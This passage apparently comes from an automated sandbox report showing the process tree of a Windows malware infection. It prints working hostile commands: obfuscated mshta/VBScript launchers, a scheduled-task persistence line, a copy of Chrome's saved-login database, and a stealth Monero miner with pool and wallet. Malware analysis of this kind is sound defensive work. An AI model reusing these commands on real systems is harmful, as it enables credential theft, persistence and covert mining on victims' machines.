                                                                                                                                                                                                                                                                                                                                                                                            Mon178d8e5d06822.exe
                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                            PID:1552
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:4120
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                  PID:4452
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\110301.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\110301.exe"
                                                                                                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                    PID:5128
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\3258372.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\3258372.exe"
                                                                                                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                    PID:5636
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8308170.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8308170.exe"
                                                                                                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                    PID:6024
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5935917.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5935917.exe"
                                                                                                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:5796
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\671081.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\671081.exe"
                                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                                                                                                                      PID:4120
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\200556.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\200556.exe"
                                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:4840
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\200556.exe"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """" == """" for %T in ( ""C:\Users\Admin\AppData\Roaming\200556.exe"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:7016
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\200556.exe" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "" == "" for %T in ( "C:\Users\Admin\AppData\Roaming\200556.exe") do taskkill /im "%~nxT" /f
                                                                                                                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:4340
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  taskkill /im "200556.exe" /f
                                                                                                                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4388
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4568
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
                                                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4796
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:5624
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
                                                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                            PID:4704
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                            PID:2392
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 792
                                                                                                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                              PID:4872
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 808
                                                                                                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                              PID:3896
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 792
                                                                                                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                              PID:7028
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 804
                                                                                                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                              PID:4484
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 928
                                                                                                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                              PID:5540
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                            PID:3080
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:4564
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5448
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6260
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6920
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5016
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4588
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7228
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8052
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4484
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2200
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5600
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4968
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4604
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4844
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4724
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\chrome3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4712
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1560
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6420
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3816
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5592
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7836
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5368
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7164
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9076
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8632
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                                                                                                                                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8440
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                                                                                                                                                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4804
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1776
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1076
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\cscript.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Adds policy Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                        • System policy modification
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6072
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          /c del "C:\Users\Admin\Pictures\Adobe Films\pQnAbYmg3ChB2IJbQyaavv5U.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4948
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7388
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5656
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SysWOW64\svchost.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5896
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\X_r3\ms9r_l_r.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\X_r3\ms9r_l_r.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7596
                                                                                                                                                                                                                                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2520
                                                                                                                                                                                                                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1852
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1372
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1328
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1148
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1092
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Schedule
